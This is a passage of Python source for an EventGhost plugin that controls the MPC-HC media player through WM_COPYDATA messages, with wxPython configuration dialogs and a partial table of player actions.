listBoxCtrl.Set(items)\n listBoxCtrl.SetBackgroundColour(self.back)\n listBoxCtrl.SetForegroundColour(self.fore)\n listBoxCtrl.SetSelectionBackground(self.backSel)\n listBoxCtrl.SetSelectionForeground(self.foreSel)\n #Font button\n fontLbl=wx.StaticText(panel, -1, self.text.menuFont)\n fontButton = eg.FontSelectButton(panel, value = fontInfo)\n font = wx.FontFromNativeInfoString(fontInfo)\n for n in range(10,20):\n font.SetPointSize(n)\n fontButton.SetFont(font)\n hght = fontButton.GetTextExtent('X')[1]\n if hght > 20:\n break\n listBoxCtrl.SetDefaultCellFont(font)\n arial = wx.FontFromNativeInfoString(arialInfoString)\n fontButton.SetFont(font)\n for n in range(1,1000):\n arial.SetPointSize(n)\n fontButton.SetFont(arial)\n h = fontButton.GetTextExtent(u\"\\u25a0\")[1]\n if h > hght:\n break\n arial.SetPointSize(2*n/3)\n fontButton.SetFont(arial)\n w0 = 2 * 
fontButton.GetTextExtent(u\"\\u25a0\")[0]\n attr = gridlib.GridCellAttr()\n attr.SetFont(arial)\n attr.SetAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)\n listBoxCtrl.SetColAttr(0,attr)\n for n in range(1,1000):\n arial.SetPointSize(n)\n fontButton.SetFont(arial)\n h = fontButton.GetTextExtent(u\"\\u25ba\")[1]\n if h > hght:\n break\n arial.SetPointSize(n/2)\n fontButton.SetFont(arial)\n w2 = 2 * fontButton.GetTextExtent(u\"\\u25ba\")[0]\n attr = gridlib.GridCellAttr()\n attr.SetFont(arial)\n attr.SetAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)\n listBoxCtrl.SetColAttr(2,attr)\n listBoxCtrl.SetDefaultRowSize(hght+4, True)\n displayChoice = eg.DisplayChoice(panel, monitor)\n w = displayChoice.GetSize()[0]\n OSElbl = wx.StaticText(panel, -1, self.text.OSELabel)\n useInvertedCtrl = wx.CheckBox(panel, -1, self.text.inverted)\n useInvertedCtrl.SetValue(inverted)\n #Button Text Colour\n foreLbl=wx.StaticText(panel, -1, self.text.txtColour+':')\n foreColourButton = eg.ColourSelectButton(panel,fore,title = self.text.txtColour)\n #Button Background Colour\n backLbl=wx.StaticText(panel, -1, self.text.background+':')\n backColourButton = eg.ColourSelectButton(panel,back,title = self.text.background)\n #Button Selected Text Colour\n foreSelLbl=wx.StaticText(panel, -1, self.text.txtColourSel+':')\n foreSelColourButton = eg.ColourSelectButton(panel,foreSel,title = self.text.txtColourSel)\n #Button Selected Background Colour\n backSelLbl=wx.StaticText(panel, -1, self.text.backgroundSel+':')\n backSelColourButton = eg.ColourSelectButton(panel,backSel,title = self.text.backgroundSel)\n #Button Dialog \"Menu control - assignment of events\"\n dialogButton = wx.Button(panel,-1,self.text.dialog)\n dialogButton.SetToolTipString(self.text.btnToolTip)\n foreSelLbl.Enable(not inverted)\n foreSelColourButton.Enable(not inverted)\n backSelLbl.Enable(not inverted)\n backSelColourButton.Enable(not inverted)\n #Sizers\n mainSizer = panel.sizer\n topSizer=wx.GridBagSizer(2, 30)\n mainSizer.Add(topSizer)\n topSizer.Add(previewLbl,(0, 0),flag = wx.TOP,border = 0)\n topSizer.Add(listBoxCtrl,(1, 0),(4, 1))\n topSizer.Add(useInvertedCtrl,(6, 0),flag = wx.TOP, border = 8)\n topSizer.Add(fontLbl,(0, 1),flag = wx.TOP)\n topSizer.Add(fontButton,(1, 1),flag = wx.TOP)\n topSizer.Add(foreLbl,(2, 1),flag = wx.TOP,border = 8)\n topSizer.Add(foreColourButton,(3, 1),flag = wx.TOP)\n topSizer.Add(backLbl,(4, 1),flag = wx.TOP,border = 8)\n topSizer.Add(backColourButton,(5, 1),flag = wx.TOP)\n topSizer.Add(OSElbl,(0, 2), flag = wx.TOP)\n topSizer.Add(displayChoice,(1, 2),flag = wx.TOP)\n topSizer.Add(foreSelLbl,(6, 1), (1, 2), flag = wx.TOP,border = 8)\n topSizer.Add(foreSelColourButton, (7, 1), flag = wx.TOP)\n topSizer.Add(backSelLbl,(8, 1), (1, 2), flag = wx.TOP,border = 8)\n topSizer.Add(backSelColourButton, (9, 1), flag = wx.TOP)\n topSizer.Add(dialogButton, (3, 2), flag = wx.TOP|wx.EXPAND)\n panel.sizer.Layout()\n wdth = 160\n if (hght+4)*listBoxCtrl.GetNumberRows() > listBoxCtrl.GetSize()[1]: #after Layout() !!!\n wdth -= SYS_VSCROLL_X\n listBoxCtrl.SetColSize(0, w0)\n listBoxCtrl.SetColSize(1, wdth - w0 - w2)\n listBoxCtrl.SetColSize(2, w2)\n listBoxCtrl.SetGridCursor(-1, 1)\n listBoxCtrl.SelectRow(0)\n\n\n def OnMonitor(evt):\n listBoxCtrl.SetFocus()\n evt.Skip()\n displayChoice.Bind(wx.EVT_CHOICE, OnMonitor)\n\n\n def OnInverted(evt):\n flag = evt.IsChecked()\n foreSelLbl.Enable(not flag)\n foreSelColourButton.Enable(not flag)\n backSelLbl.Enable(not flag)\n backSelColourButton.Enable(not flag)\n self.inverted = flag\n if flag:\n 
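# --- Illustrative sketch (editor's addition): the probe loops above grow a point size until a measured text extent crosses a target pixel height. The core pattern in isolation; measure() is a hypothetical stand-in for GetTextExtent, not a wx API:\n# def fit_point_size(measure, target_h, lo=1, hi=1000):\n#     for pt in range(lo, hi):\n#         if measure(pt) > target_h:\n#             return pt        # first size whose rendered height exceeds the target\n#     return hi\n# # e.g. fit_point_size(lambda pt: int(pt * 1.3), 20) mirrors the\n# # 'if hght > 20: break' loop used for the menu font.\n# --- end sketch ---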
self.foreSel = self.back\n self.backSel = self.fore\n backSelColourButton.SetValue(self.backSel)\n foreSelColourButton.SetValue(self.foreSel)\n listBoxCtrl.SetSelectionForeground(self.foreSel)\n listBoxCtrl.SetSelectionBackground(self.backSel)\n listBoxCtrl.SetFocus()\n evt.Skip()\n useInvertedCtrl.Bind(wx.EVT_CHECKBOX, OnInverted)\n\n\n def OnDialogBtn(evt):\n dlg = MenuEventsDialog(\n parent = panel,\n plugin = self.plugin,\n )\n dlg.Centre()\n wx.CallAfter(dlg.ShowMenuEventsDialog, self.text.evtAssignTitle, self.text.events)\n evt.Skip()\n dialogButton.Bind(wx.EVT_BUTTON, OnDialogBtn)\n\n\n def OnFontBtn(evt):\n value = evt.GetValue()\n self.fontInfo = value\n font = wx.FontFromNativeInfoString(value)\n for n in range(10,20):\n font.SetPointSize(n)\n fontButton.SetFont(font)\n hght = fontButton.GetTextExtent('X')[1]\n if hght > 20:\n break\n listBoxCtrl.SetDefaultCellFont(font)\n listBoxCtrl.SetDefaultRowSize(hght+4, True)\n for i in range(listBoxCtrl.GetNumberRows()):\n listBoxCtrl.SetCellFont(i,1,font)\n listBoxCtrl.SetFocus()\n if evt:\n evt.Skip()\n fontButton.Bind(eg.EVT_VALUE_CHANGED, OnFontBtn)\n\n def OnColourBtn(evt):\n id = evt.GetId()\n value = evt.GetValue()\n if id == foreColourButton.GetId():\n listBoxCtrl.SetForegroundColour(value)\n if self.inverted:\n self.backSel = self.fore\n listBoxCtrl.SetSelectionBackground(value)\n backSelColourButton.SetValue(value)\n elif id == backColourButton.GetId():\n listBoxCtrl.SetBackgroundColour(value)\n if self.inverted:\n self.foreSel = self.back\n listBoxCtrl.SetSelectionForeground(value)\n foreSelColourButton.SetValue(value)\n elif id == foreSelColourButton.GetId():\n listBoxCtrl.SetSelectionForeground(value)\n elif id == backSelColourButton.GetId():\n listBoxCtrl.SetSelectionBackground(value)\n listBoxCtrl.Refresh()\n listBoxCtrl.SetFocus()\n evt.Skip()\n foreColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n backColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n foreSelColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n backSelColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n\n\n def setFocus():\n listBoxCtrl.SetFocus()\n panel.setFocus = setFocus\n\n # re-assign the test button\n def OnButton(event):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n if not self.plugin.menuDlg:\n self.plugin.menuDlg = Menu()\n self.event = CreateEvent(None, 0, 0, None)\n wx.CallAfter(self.plugin.menuDlg.ShowMenu,\n foreColourButton.GetValue(),\n backColourButton.GetValue(),\n foreSelColourButton.GetValue(),\n backSelColourButton.GetValue(),\n self.fontInfo,\n True,\n self.plugin,\n self.event,\n displayChoice.GetSelection(),\n self.plugin.mpcHwnd,\n panel.evtList\n )\n eg.actionThread.WaitOnEvent(self.event)\n else:\n self.PrintError(eg.Classes.Exceptions.Text.ProgramNotRunning)\n panel.dialog.buttonRow.testButton.Bind(wx.EVT_BUTTON, OnButton)\n\n while panel.Affirmed():\n fontInfo = fontButton.GetValue()\n if not fontInfo:\n font = listBoxCtrl.GetFont()\n font.SetPointSize(36)\n fontInfo = font.GetNativeFontInfoDesc()\n panel.SetResult(\n foreColourButton.GetValue(),\n backColourButton.GetValue(),\n fontInfo,\n displayChoice.GetSelection(),\n foreSelColourButton.GetValue(),\n backSelColourButton.GetValue(),\n panel.evtList,\n useInvertedCtrl.GetValue()\n )\n#===============================================================================\nclass Run(eg.ActionBase):\n\n def __call__(self):\n if self.plugin.mpcPath:\n self.plugin.ConnectMpcHc()\n#===============================================================================\n\nclass 
MediaPlayerClassic(eg.PluginBase):\n\n mySched = None\n myStart = None\n menuDlg = None\n state = None\n playstate = 3\n np_payload = None\n mpcHwnd = None\n event = None\n result = None\n runFlg = False\n strtFlg = False\n connected = False\n\n class text:\n popup = (\n \"Delete item\",\n \"Delete all items\",\n )\n cancel = 'Cancel'\n ok = 'OK'\n clear = \"Clear all\"\n toolTip = \"Drag-and-drop an event from the log into the box.\"\n opened = \"Opened\"\n closed = \"Closed\"\n label = \"Path to MPC-HC executable:\"\n fileMask = \"MPC-HC executable|mpc-hc*.exe|All EXE files (*.exe)|*.exe\"\n gotoLabel = \"Go To...\"\n fltr='\"NowPlaying\" event is only triggered when the payload is changed'\n\n def ParseMsg(self, msg):\n msg = msg.replace(u\"\\\\|\", u\"\\xb0*\\u2734*\\xb0\")\n msg = msg.split(u\"|\")\n for i in range(len(msg)):\n msg[i] = msg[i].replace(u\"\\xb0*\\u2734*\\xb0\", u\"|\")\n return msg\n\n\n @eg.LogIt\n def Handler(self, hwnd, mesg, wParam, lParam):\n if not self.runFlg:\n return True\n cpyData = cast(lParam, PCOPYDATASTRUCT)\n cmd = cpyData.contents.dwData\n msg = wstring_at(cpyData.contents.lpData)\n if cmd == CMD_CONNECT:\n self.mpcHwnd = int(msg)\n self.connected = True\n eg.TriggerEvent(\"Connected\",prefix=\"MPC-HC\")\n elif cmd == CMD_STATE:\n state = int(msg)\n if self.state != state:\n self.state = state\n eg.TriggerEvent(\"State.\"+MPC_LOADSTATE[state],prefix=\"MPC-HC\")\n elif cmd == CMD_NOWPLAYING:\n if self.playstate == 3: # if the plugin is started when MPC-HC is already playing\n self.playstate = 0\n msg = self.ParseMsg(msg)\n if msg != self.np_payload:\n self.np_payload = msg\n eg.TriggerEvent(\"NowPlaying\",prefix=\"MPC-HC\", payload = msg)\n\n elif cmd == CMD_PLAYMODE:\n self.playstate = int(msg)\n eg.TriggerEvent(\"Playstate.\"+MPC_PLAYSTATE[self.playstate],prefix=\"MPC-HC\")\n\n elif cmd == CMD_NOTIFYSEEK:\n eg.TriggerEvent(\"Seek\",prefix=\"MPC-HC\",payload = int(0.5+float(msg)))\n\n elif cmd in (\n CMD_CURRENTPOSITION,\n CMD_LISTSUBTITLETRACKS,\n CMD_LISTAUDIOTRACKS,\n CMD_PLAYLIST\n ):\n if self.event:\n self.result = self.ParseMsg(msg)\n SetEvent(self.event)\n\n elif cmd == CMD_NOTIFYENDOFSTREAM:\n eg.TriggerEvent(\"EndOfStream\",prefix=\"MPC-HC\")\n return True\n\n\n def ConnectMpcHc(self):\n if not self.runFlg:\n mp = self.mpcPath\n mp = mp.encode(FSE) if isinstance(mp, unicode) else mp\n if isfile(mp):\n self.runFlg = True\n self.strtFlg = False\n args = [mp]\n args.append(\"/slave\")\n args.append(str(self.mr.hwnd))\n Popen(args)\n\n\n def isResponding(self, hwnd):\n try:\n SendMessageTimeout(hwnd, 0, timeout = 1000) # 0 = WM_NULL\n return True\n except:\n return False\n\n\n def isRunning(self):\n try:\n return FindWindow(u'MediaPlayerClassicW', None)\n except:\n return False\n\n\n def waitBeforeConnect(self):\n hwnd = self.isRunning()\n if hwnd:\n if self.isResponding(hwnd):\n eg.scheduler.AddTask(1, self.ConnectMpcHc)\n else:\n self.myStart = eg.scheduler.AddTask(2, self.waitBeforeConnect)\n else:\n self.strtFlg = False\n\n\n def mpcIsRunning(self):\n self.mySched=eg.scheduler.AddTask(2, self.mpcIsRunning) # must run continuously !\n if not self.isRunning(): #user closed MPC-HC ?\n if self.runFlg and self.connected:\n self.runFlg = False\n self.connected = False\n self.strtFlg = False\n self.myStart = None\n self.mpcHwnd = None\n elif self.runFlg:\n pass\n elif not self.strtFlg:\n self.strtFlg = True\n self.myStart = eg.scheduler.AddTask(2, self.waitBeforeConnect)\n\n\n def SendCopydata(self, cmd, txt):\n if self.mpcHwnd is not None:\n 
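# --- Illustrative sketch (editor's addition): ParseMsg above hides escaped pipes behind an unlikely sentinel before splitting on the real separators. The same round trip as a standalone function:\n# SENTINEL = u\"\\xb0*\\u2734*\\xb0\"\n# def parse(msg):\n#     msg = msg.replace(u\"\\\\|\", SENTINEL)                 # hide escaped pipes\n#     parts = msg.split(u\"|\")                              # split on real separators\n#     return [p.replace(SENTINEL, u\"|\") for p in parts]    # restore literal pipes\n# assert parse(u\"a\\\\|b|c\") == [u\"a|b\", u\"c\"]\n# --- end sketch ---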
cpyData = create_unicode_buffer(txt)\n cds = COPYDATASTRUCT()\n cds.dwData = cmd\n cds.lpData = cast(cpyData, c_void_p)\n cds.cbData = sizeof(cpyData)\n return SendMessage(self.mpcHwnd, WM_COPYDATA, 0, addressof(cds))\n\n\n def __init__(self):\n self.mr = eg.MessageReceiver(\"MPC-HC_plugin_\")\n self.mr.AddHandler(WM_COPYDATA, self.Handler)\n self.mr.Start()\n self.AddActionsFromList(ACTIONS, ActionPrototype)\n\n\n def __start__(self, mpcPath=None, fltr=True):\n self.fltr=fltr\n self.mySched=None\n self.myStart=None\n self.menuDlg = None\n self.state = None\n self.mpcHwnd = None\n self.event = None\n self.result = None\n self.runFlg = False\n self.strtFlg = False\n self.connected = False\n self.playstate = 3\n self.np_payload = None\n if mpcPath is None:\n mpcPath = self.GetMpcHcPath()\n if not mpcPath or not exists(mpcPath):\n raise self.Exceptions.ProgramNotFound\n return\n self.mpcPath = mpcPath\n hWnd = Find_MPC()\n if hWnd:\n self.mpcHwnd = hWnd[0]\n eg.scheduler.AddTask(1, self.mpcIsRunning)\n\n\n def __stop__(self):\n if self.mySched:\n try:\n eg.scheduler.CancelTask(self.mySched)\n except:\n pass\n if self.myStart:\n try:\n eg.scheduler.CancelTask(self.myStart)\n except:\n pass\n\n\n def __close__(self):\n self.mr.RemoveHandler(WM_COPYDATA, self.Handler)\n self.mr.Stop()\n self.mr = None\n\n\n def Configure(self, mpcPath=None,fltr=True):\n if mpcPath is None:\n mpcPath = self.GetMpcHcPath()\n if mpcPath is None:\n mpcPath = join(\n eg.folderPath.ProgramFiles,\n \"MediaPlayerClassic\",\n \"mpc-hc.exe\"\n )\n panel = eg.ConfigPanel()\n filepathCtrl = eg.FileBrowseButton(\n panel,\n size=(320,-1),\n initialValue=mpcPath,\n startDirectory=eg.folderPath.ProgramFiles,\n labelText=\"\",\n fileMask = self.text.fileMask,\n buttonText=eg.text.General.browse,\n )\n fltrCtrl = wx.CheckBox(panel, -1, self.text.fltr)\n fltrCtrl.SetValue(fltr)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(wx.StaticText(panel,-1,self.text.label))\n sizer.Add(filepathCtrl)\n sizer.Add(fltrCtrl,0,wx.TOP,20)\n panel.sizer.Add(sizer,0,wx.ALL,10)\n while panel.Affirmed():\n panel.SetResult(\n filepathCtrl.GetValue(),\n fltrCtrl.GetValue()\n )\n\n\n def GetMpcHcPath(self):\n \"\"\"\n Get the path of MPC-HC's installation directory through querying\n the Windows registry.\n \"\"\"\n try:\n if \"PROCESSOR_ARCHITEW6432\" in environ:\n args = [_winreg.HKEY_CURRENT_USER,\n \"Software\\MPC-HC\\MPC-HC\"]\n args.extend((0, _winreg.KEY_READ | _winreg.KEY_WOW64_64KEY))\n else:\n args = [_winreg.HKEY_CURRENT_USER,\n \"Software\\Gabest\\Media Player Classic\"]\n mpc = _winreg.OpenKey(*args)\n mpcPath =_winreg.QueryValueEx(mpc, \"ExePath\")[0]\n _winreg.CloseKey(mpc)\n except WindowsError:\n mpcPath = None\n return mpcPath\n\n\n def GetWindowState(self):\n hWnd = Find_MPC()\n if not hWnd:\n return -1\n else:\n hWnd = hWnd[0]\n if not IsWindowVisible(hWnd):\n return 0\n state = GetWindowPlacement(hWnd)[1]\n border = GetWindowLong(hWnd, GWL_EXSTYLE) & WS_EX_WINDOWEDGE\n if border:\n return state\n rect = GetWindowRect(hWnd)\n mons = EnumDisplayMonitors()\n fullscreen = False\n for mon in mons:\n if rect == mon[2]:\n fullscreen = True\n break\n if fullscreen:\n return 4\n return state\n#===============================================================================\n\nclass SendCmd(eg.ActionBase):\n def __call__(self):\n self.plugin.SendCopydata(self.value, u\"\")\n#===============================================================================\n\nclass GetInfo(eg.ActionBase):\n def __call__(self):\n self.plugin.result = None\n 
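# --- Illustrative sketch (editor's addition): SendCopydata above marshals a unicode payload into a COPYDATASTRUCT and posts it via WM_COPYDATA. A self-contained ctypes version of the same call (Windows only; hwnd is a hypothetical target window handle, not taken from this plugin):\n# import ctypes\n# from ctypes import wintypes\n# WM_COPYDATA = 0x004A\n# class COPYDATASTRUCT(ctypes.Structure):\n#     _fields_ = [(\"dwData\", ctypes.c_void_p),    # command id\n#                 (\"cbData\", wintypes.DWORD),      # payload size in bytes\n#                 (\"lpData\", ctypes.c_void_p)]     # pointer to the payload\n# def send_copydata(hwnd, cmd, text):\n#     buf = ctypes.create_unicode_buffer(text)\n#     cds = COPYDATASTRUCT(cmd, ctypes.sizeof(buf),\n#                          ctypes.cast(buf, ctypes.c_void_p))\n#     return ctypes.windll.user32.SendMessageW(hwnd, WM_COPYDATA, 0,\n#                                              ctypes.byref(cds))\n# --- end sketch ---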
self.plugin.event = CreateEvent(None, 0, 0, None)\n if self.plugin.SendCopydata(self.value, u\"\"):\n eg.actionThread.WaitOnEvent(self.plugin.event)\n self.plugin.event = None\n if self.plugin.result:\n return self.plugin.result\n#===============================================================================\n\nclass OpenFile(eg.ActionBase):\n\n class text:\n toolTipFile = 'Type filename or click browse to choose file'\n browseFile = 'Choose a file'\n\n\n def __call__(self, filepath = \"\"):\n if filepath:\n filepath = eg.ParseString(filepath)\n self.plugin.SendCopydata(self.value, filepath)\n\n\n def Configure(self, filepath = \"\"):\n panel = eg.ConfigPanel()\n folder = split(filepath)[0] if filepath else eg.folderPath.Videos\n filepathLabel = wx.StaticText(panel, -1, \"%s:\" % self.text.browseFile)\n filepathCtrl = eg.FileBrowseButton(\n panel,\n -1,\n toolTip = self.text.toolTipFile,\n dialogTitle = self.text.browseFile,\n buttonText = eg.text.General.browse,\n startDirectory = folder,\n initialValue = filepath\n )\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.Add(filepathLabel,0,wx.TOP,3)\n sizer.Add(filepathCtrl,1,wx.LEFT|wx.EXPAND,5)\n panel.sizer.Add(sizer,0,wx.ALL|wx.EXPAND,20)\n while panel.Affirmed():\n panel.SetResult(\n filepathCtrl.GetValue(),\n )\n#===============================================================================\n\nclass GetPosition(eg.ActionBase):\n\n def __call__(self):\n self.plugin.result = None\n self.plugin.event = CreateEvent(None, 0, 0, None)\n if self.plugin.SendCopydata(CMD_GETCURRENTPOSITION, u\"\"):\n eg.actionThread.WaitOnEvent(self.plugin.event)\n self.plugin.event = None\n if self.plugin.result:\n return int(0.5+float(self.plugin.result[0]))\n#===============================================================================\n\nclass SetInteger(eg.ActionBase):\n\n class text:\n labels = (\n (\"Jump of\", \"seconds (negative values for backward)\"),\n (\"New position:\", \"seconds\"),\n (\"Index of the audio track:\", \"\"),\n (\"Index of the subtitle track:\", \"(-1 for disabling subtitles)\"),\n (\"Index of the active file:\", \"(-1 for no file selected)\"),\n (\"New audio delay:\", \"milliseconds\"),\n (\"New subtitle delay:\", \"milliseconds\"),\n )\n\n\n def __call__(self, value=0):\n value = unicode(value)\n self.plugin.SendCopydata(self.value[0], value)\n\n\n def Configure(self, value=0):\n panel = eg.ConfigPanel()\n label_1 = wx.StaticText(panel,-1,self.text.labels[self.value[1]][0])\n label_2 = wx.StaticText(panel,-1,self.text.labels[self.value[1]][1])\n valueCtrl = eg.SpinIntCtrl(panel, -1, value, max=self.value[3],min=self.value[2])\n sizer = wx.FlexGridSizer(1, 3, 5, 10)\n sizer.Add(label_1,0,wx.TOP,3)\n sizer.Add(valueCtrl)\n sizer.Add(label_2,0,wx.TOP,3)\n panel.sizer.Add(sizer,0,wx.ALL|wx.EXPAND,20)\n while panel.Affirmed():\n panel.SetResult(\n valueCtrl.GetValue(),\n )\n#===============================================================================\n\nclass SendOSD(eg.ActionBase):\n\n class text:\n osdLabel = \"OSD text:\"\n durLabel = \"Duration [s]:\"\n posLabel = \"Position:\"\n position = (\n \"None (clear)\",\n \"Top left\",\n \"Top right\",\n )\n\n\n def __call__(self, osd=\"\", dur=3, pos=1):\n if self.plugin.mpcHwnd is not None:\n osd = eg.ParseString(osd) + \"\\0\"\n OSDDATA.nMsgPos = pos\n OSDDATA.nDurationMS = 1000*dur\n OSDDATA.strMsg = osd.encode(eg.systemEncoding)\n cds = COPYDATASTRUCT()\n cds.dwData = CMD_OSDSHOWMESSAGE\n cds.cbData = sizeof(OSDDATA)\n cds.lpData = cast(addressof(OSDDATA), c_void_p)\n 
SendMessage(self.plugin.mpcHwnd, WM_COPYDATA, 0, addressof(cds))\n\n\n def Configure(self, osd=\"\", dur=3, pos=1):\n panel = eg.ConfigPanel()\n osdLabel = wx.StaticText(panel,-1,self.text.osdLabel)\n posLabel = wx.StaticText(panel,-1,self.text.posLabel)\n durLabel = wx.StaticText(panel,-1,self.text.durLabel)\n osdCtrl = wx.TextCtrl(panel,-1,osd, size=(200,-1))\n durCtrl = eg.SpinIntCtrl(panel, -1, dur, max=99999)\n posCtrl = wx.Choice(panel,-1,choices=self.text.position)\n posCtrl.SetSelection(pos)\n sizer = wx.FlexGridSizer(3, 2, 5, 10)\n sizer.Add(osdLabel,0,wx.TOP,3)\n sizer.Add(osdCtrl)\n sizer.Add(durLabel,0,wx.TOP,3)\n sizer.Add(durCtrl)\n sizer.Add(posLabel,0,wx.TOP,3)\n sizer.Add(posCtrl)\n panel.sizer.Add(sizer,0,wx.ALL|wx.EXPAND,20)\n\n while panel.Affirmed():\n panel.SetResult(\n osdCtrl.GetValue(),\n durCtrl.GetValue(),\n posCtrl.GetSelection(),\n )\n#===============================================================================\n\nACTIONS = (\n(eg.ActionGroup, 'GroupMainControls', 'Main controls', None, (\n (Run, \"Run\", \"Run MPC-HC\", \"Run MPC-HC with its default settings.\" ,None),\n ('Exit', 'Quit Application', None, 816),\n ('PlayPause', 'Play/Pause', None, 889),\n ('Play', 'Play', None, 887),\n ('Pause', 'Pause', None, 888),\n ('Stop', 'Stop', None, 890),\n ('JumpForwardSmall', 'Jump Forward Small', None, 900),\n ('JumpBackwardSmall', 'Jump Backward Small', None, 899),\n ('JumpForwardMedium', 'Jump Forward Medium', None, 902),\n ('JumpBackwardMedium', 'Jump Backward Medium', None, 901),\n ('JumpForwardLarge', 'Jump Forward Large', None, 904),\n ('JumpBackwardLarge', 'Jump Backward Large', None, 903),\n ('JumpForwardKeyframe', 'Jump Forward Keyframe', None, 898),\n ('JumpBackwardKeyframe', 'Jump Backward Keyframe', None, 897),\n (\n SetInteger,\n \"Jump\",\n \"Jump forward/backward of N seconds\",\n \"Jumps forward/backward of N seconds.\",\n (CMD_JUMPOFNSECONDS,0,-99999,99999)\n ),\n (\n SetInteger,\n \"SetPosition\",\n \"Cue current file to specific position\",\n \"Cues current file to a specific position.\",\n (CMD_SETPOSITION,1,1,999999)\n ), ('IncreaseRate', 'Increase Rate', None, 895),\n ('DecreaseRate', 'Decrease Rate', None, 894),\n ('ResetRate', 'Reset Rate', None, 896),\n ('VolumeUp', 'Volume Up', None, 907),\n ('VolumeDown', 'Volume Down', None, 908),\n ('VolumeMute', 'Volume Mute', None, 909),\n ('BossKey', 'Boss Key', None, 944),\n ('Next', 'Next', None, 922),\n ('Previous', 'Previous', None, 921),\n (SendCmd,\"StartPlaylist\",\"Start playing playlist\",\"Starts playing playlist.\",CMD_STARTPLAYLIST),\n (SendCmd,\"ClearPlaylist\",\"Remove all files from playlist\",\"Removes all files from playlist.\",CMD_CLEARPLAYLIST),\n ('NextPlaylistItem', 'Next Playlist Item', None, 920),\n ('PreviousPlaylistItem', 'Previous Playlist Item', None, 919),\n (OpenFile,\"AddFile\",\"Add file to playlist\",\"Adds a new file to the playlist (does not start playing).\",CMD_ADDTOPLAYLIST),\n #(\n # SetInteger,\n # \"SetActiveFile\",\n # \"Set the active file in the playlist\",\n # \"Sets the active file in the playlist.\",\n # (CMD_SETINDEXPLAYLIST,4,-1,9)\n #),\n ('OpenDVD', 'Open DVD', None, 801),\n ('OpenFileDialog', 'Show dialog \"Open file\"', None, 800),\n (OpenFile,\"OpenFile\",\"Open file\",\"Opens file.\",CMD_OPENFILE),\n ('QuickOpen', 'Quick Open File', None, 969),\n ('OpenDirectory', 'Open Directory', None, 33208),\n ('FrameStep', 'Frame Step', None, 891),\n ('FrameStepBack', 'Frame Step Back', None, 892),\n ('GoTo', 'Go To', None, 893),\n ('AudioDelayAdd10ms', 'Audio Delay 
+10ms', None, 905),\n ('AudioDelaySub10ms', 'Audio Delay -10ms', None, 906),\n (\n SetInteger,\n \"SetAudioDelay\",\n \"Set the audio delay\",\n \"Sets the audio delay.\",\n (CMD_SETAUDIODELAY,5,-999999,999999)\n ),\n)),\n(eg.ActionGroup, 'GroupViewModes', 'View modes', None, (\n ('Fullscreen', 'Fullscreen', None, 830),\n ('FullscreenWOR', 'Fullscreen without resolution change', None, 831),\n ('PnSIncSize', 'Pan & Scan Increase Size', None, 862),\n ('PnSDecSize', 'Pan & Scan Decrease Size', None, 863),\n ('PnSTo169', 'Pan & Scan Scale to 16:9', None, 4100),\n ('PnSToWidescreen', 'Pan & Scan to Widescreen', None, 4101),\n ('PnSToUltraWidescreen', 'Pan & Scan to Ultra-Widescreen', None, 4102),\n ('ViewMinimal', 'View Minimal', None, 827),\n ('ViewCompact', 'View Compact', None, 828),\n ('ViewNormal', 'View Normal', None, 829),\n ('AlwaysOnTop', 'Always On Top', None, 884),\n ('Zoom50', 'Zoom 50%', None, 832),\n ('Zoom100', 'Zoom 100%', None, 833),\n ('Zoom200', 'Zoom 200%', None, 834),\n ('VidFrmHalf', 'Video Frame Half', None, 835),\n ('VidFrmNormal', 'Video Frame Normal', None, 836),\n ('VidFrmDouble', 'Video Frame Double', None, 837),\n ('VidFrmStretch', 'Video Frame Stretch', None, 838),\n ('VidFrmInside', 'Video Frame Inside', None, 839),\n ('VidFrmOutside', 'Video Frame Outside', None, 840),\n ('PnSReset', 'Pan & Scan Reset', None, 861),\n ('PnSIncWidth', 'Pan & Scan Increase Width', None, 864),\n ('PnSIncHeight', 'Pan & Scan Increase Height', None, 866),\n ('PnSDecWidth', 'Pan & Scan Decrease Width', None, 865),\n ('PnSDecHeight', 'Pan & Scan Decrease Height', None, 867),\n ('PnSCenter', 'Pan & Scan Center', None, 876),\n ('PnSLeft', 'Pan & Scan Left', None, 868),\n ('PnSRight', 'Pan & Scan Right', None, 869),\n ('PnSUp', 'Pan & Scan Up', None, 870),\n ('PnSDown', 'Pan & Scan Down', None, 871),\n ('PnSUpLeft', 'Pan & Scan Up/Left', None, 872),\n ('PnSUpRight', 'Pan & Scan Up/Right', None, 873),\n ('PnSDownLeft', 'Pan & Scan Down/Left', None, 874),\n ('PnSDownRight', 'Pan & Scan Down/Right', None, 875),\n ('PnSRotateAddX', 'Pan & Scan Rotate X+', None, 877),\n ('PnSRotateSubX', 'Pan & Scan Rotate X-', None, 878),\n ('PnSRotateAddY', 'Pan & Scan Rotate Y+', None, 879),\n ('PnsRotateSubY', 'Pan & Scan Rotate Y-', None, 880),\n ('PnSRotateAddZ', 'Pan & Scan Rotate Z+', None, 881),\n ('PnSRotateSubZ', 'Pan & Scan Rotate Z-', None, 882),\n)),\n(eg.ActionGroup, 'GroupDvdControls', 'DVD controls', None, (\n ('DVDTitleMenu', 'DVD Title Menu', None, 923),\n ('DVDRootMenu', 'DVD Root Menu', None, 924),\n ('DVDSubtitleMenu', 'DVD Subtitle Menu', None, 925),\n ('DVDAudioMenu', 'DVD Audio Menu', None, 926),\n ('DVDAngleMenu', 'DVD Angle Menu', None, 927),\n ('DVDChapterMenu', 'DVD Chapter Menu', None, 928),\n ('DVDMenuLeft', 'DVD Menu Left', None, 929),\n ('DVDMenuRight', 'DVD Menu Right', None, 930),\n ('DVDMenuUp', 'DVD Menu Up', None, 931),\n ('DVDMenuDown', 'DVD Menu Down', None, 932),\n ('DVDMenuActivate', 'DVD Menu Activate', None, 933),\n ('DVDMenuBack', 'DVD Menu Back', None, 934),\n ('DVDMenuLeave', 'DVD Menu Leave', None, 935),\n ('DVDNextAngle', 'DVD Next Angle', None, 961),\n ('DVDPrevAngle', 'DVD Previous Angle', None, 962),\n ('DVDNextAudio', 'DVD Next Audio', None, 963),\n ('DVDPrevAudio', 'DVD Prev 